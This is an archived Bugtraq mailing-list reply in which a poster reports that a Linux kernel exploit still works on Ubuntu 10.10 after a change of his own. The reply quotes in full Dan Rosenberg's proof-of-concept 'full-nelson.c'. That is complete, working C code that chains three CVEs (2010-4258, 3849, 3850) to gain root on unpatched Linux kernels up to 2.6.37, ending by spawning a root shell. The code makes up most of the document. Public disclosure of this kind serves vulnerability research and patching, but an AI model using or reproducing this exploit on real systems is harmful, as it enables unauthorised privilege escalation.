Re: Linux kernel exploit

From: Wolf <crate@live.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Re: Linux kernel exploit
Date:


Well, I'm a first time writer to Bugtraq, but this is interesting. I
commented out the call to clone(), and after it simply called
trigger(fildes), and apparently, it works. Only tested on a stock
install of Ubuntu 10.10, but I thought the bug was in clone()?

On 12/7/2010 2:25 PM, Dan Rosenberg wrote:
> Hi all,
> 
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
> 
> Happy hacking,
> Dan
> 
> 
> --snip--
> 
> /*
>  * Linux Kernel <= 2.6.37 local privilege escalation
>  * by Dan Rosenberg
>  * @djrbliss on twitter
>  *
>  * Usage:
>  * gcc full-nelson.c -o full-nelson
>  * ./full-nelson
>  *
>  * This exploit leverages three vulnerabilities to get root, all of which were
>  * discovered by Nelson Elhage:
>  *
>  * CVE-2010-4258
>  * -------------
>  * This is the interesting one, and the reason I wrote this exploit.  If a
>  * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>  * word will be written to a user-specified pointer when that thread exits.
>  * This write is done using put_user(), which ensures the provided destination
>  * resides in valid userspace by invoking access_ok().  However, Nelson
>  * discovered that when the kernel performs an address limit override via
>  * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>  * etc.), this override is not reverted before calling put_user() in the exit
>  * path, allowing a user to write a NULL word to an arbitrary kernel address.
>  * Note that this issue requires an additional vulnerability to trigger.
>  *
>  * CVE-2010-3849
>  * -------------
>  * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
>  * fairly benign as a local denial-of-service.  It's a perfect candidate to
>  * trigger the above issue, since it's reachable via sock_no_sendpage(), which
>  * subsequently calls sendmsg under KERNEL_DS.
>  *
>  * CVE-2010-3850
>  * -------------
>  * I wouldn't be able to reach the NULL pointer dereference and trigger the
>  * OOPS if users weren't able to assign Econet addresses to arbitrary
>  * interfaces due to a missing capabilities check.
>  *
>  * In the interest of public safety, this exploit was specifically designed to
>  * be limited:
>  *
>  *  * The particular symbols I resolve are not exported on Slackware or Debian
>  *  * Red Hat does not support Econet by default
>  *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>  *    Debian
>  *
>  * However, the important issue, CVE-2010-4258, affects everyone, and it would
>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>  * more sophisticated version of this that doesn't have the roadblocks I put in
>  * to prevent abuse by script kiddies.
>  *
>  * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>  *
>  * NOTE: the exploit process will deadlock and stay in a zombie state after you
>  * exit your root shell because the Econet thread OOPSes while holding the
>  * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
>  *
>  * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>  */
> 
> #include <stdio.h>
> #include <sys/socket.h>
> #include <fcntl.h>
> #include <sys/ioctl.h>
> #include <string.h>
> #include <net/if.h>
> #include <sched.h>
> #include <stdlib.h>
> #include <signal.h>
> #include <sys/utsname.h>
> #include <sys/mman.h>
> #include <unistd.h>
> 
> /* How many bytes should we clear in our
>  * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
> 
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
>     FILE *f;
>     unsigned long addr;
>  char dummy;
>  char sname[512];
>     struct utsname ver;
>  int ret;
>     int rep = 0;
>         int oldstyle = 0;
> 
>        f = fopen("/proc/kallsyms", "r");
>        if (f == NULL) {
>             f = fopen("/proc/ksyms", "r");
>           if (f == NULL)
>                       goto fallback;
>               oldstyle = 1;
>        }
> 
> repeat:
>     ret = 0;
>     while(ret != EOF) {
>          if (!oldstyle)
>                       ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
>            else {
>                       ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>                    if (ret == 2) {
>                              char *p;
>                             if (strstr(sname, "_O/") || strstr(sname, "_S."))
>                                        continue;
>                            p = strrchr(sname, '_');
>                           if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
>                                         p = p - 4;
>                                   while (p > (char *)sname && *(p - 1) == '_')
>                                                p--;
>                                         *p = '\0';
>                                 }
>                    }
>            }
>            if (ret == 0) {
>                      fscanf(f, "%s\n", sname);
>                  continue;
>            }
>            if (!strcmp(name, sname)) {
>                  fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
>                     fclose(f);
>                   return addr;
>                 }
>    }
> 
>        fclose(f);
>   if (rep)
>             return 0;
> fallback:
>       uname(&ver);
>    if (strncmp(ver.release, "2.6", 3))
>                oldstyle = 1;
>        sprintf(sname, "/boot/System.map-%s", ver.release);
>        f = fopen(sname, "r");
>     if (f == NULL)
>               return 0;
>    rep = 1;
>     goto repeat;
> }
> 
> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
> typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
> _commit_creds commit_creds;
> _prepare_kernel_cred prepare_kernel_cred;
> 
> static int __attribute__((regparm(3)))
> getroot(void * file, void * vma)
> {
> 
>         commit_creds(prepare_kernel_cred(0));
>         return -1;
> 
> }
> 
> /* Why do I do this?  Because on x86-64, the address of
>  * commit_creds and prepare_kernel_cred are loaded relative
>  * to rip, which means I can't just copy the above payload
>  * into my landing area. */
> void __attribute__((regparm(3)))
> trampoline()
> {
> 
> #ifdef __x86_64__
>  asm("mov $getroot, %rax; call *%rax;");
> #else
>   asm("mov $getroot, %eax; call *%eax;");
> #endif
> 
> }
> 
> /* Triggers a NULL pointer dereference in econet_sendmsg
>  * via sock_no_sendpage, so it's under KERNEL_DS */
> int trigger(int * fildes)
> {
>   int ret;
>     struct ifreq ifr;
> 
>        memset(&ifr, 0, sizeof(ifr));
>   strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
> 
>       ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
> 
>  if(ret < 0) {
>           printf("[*] Failed to set Econet address.\n");
>             return -1;
>   }
> 
>        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
>    splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
> 
>        /* Shouldn't get here... */
>     exit(0);
> }
> 
> int main(int argc, char * argv[])
> {
>  unsigned long econet_ops, econet_ioctl, target, landing;
>     int fildes[4], pid;
>  void * newstack, * payload;
> 
>      /* Create file descriptors now so there are two
>         references to them after cloning...otherwise
>         the child will never return because it
>       deadlocks when trying to unlock various
>      mutexes after OOPSing */
>  pipe(fildes);
>        fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
>        fildes[3] = open("/dev/zero", O_RDONLY);
> 
>       if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
>           printf("[*] Failed to open file descriptors.\n");
>          return -1;
>   }
> 
>        /* Resolve addresses of relevant symbols */
>  printf("[*] Resolving kernel addresses...\n");
>     econet_ioctl = get_kernel_sym("econet_ioctl");
>     econet_ops = get_kernel_sym("econet_ops");
>         commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
>     prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
> 
>    if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
>          printf("[*] Failed to resolve kernel symbols.\n");
>                 return -1;
>   }
> 
>        if(!(newstack = malloc(65536))) {
>            printf("[*] Failed to allocate memory.\n");
>                return -1;
>   }
> 
>        printf("[*] Calculating target...\n");
>     target = econet_ops + 10 * sizeof(void *) - OFFSET;
> 
>      /* Clear the higher bits */
>  landing = econet_ioctl << SHIFT >> SHIFT;
> 
>    payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
>                   PROT_READ | PROT_WRITE | PROT_EXEC,
>                  MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
> 
>   if ((long)payload == -1) {
>           printf("[*] Failed to mmap() at target address.\n");
>               return -1;
>   }
> 
>        memcpy((void *)landing, &trampoline, 1024);
> 
>         clone((int (*)(void *))trigger,
>            (void *)((unsigned long)newstack + 65536),
>           CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
>           &fildes, NULL, NULL, target);
> 
>         sleep(1);
> 
>        printf("[*] Triggering payload...\n");
>     ioctl(fildes[2], 0, NULL);
> 
>       if(getuid()) {
>               printf("[*] Exploit failed to get root.\n");
>               return -1;
>   }
> 
>        printf("[*] Got root!\n");
>         execl("/bin/sh", "/bin/sh", NULL);
> }
> 
> 
> 
> 





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.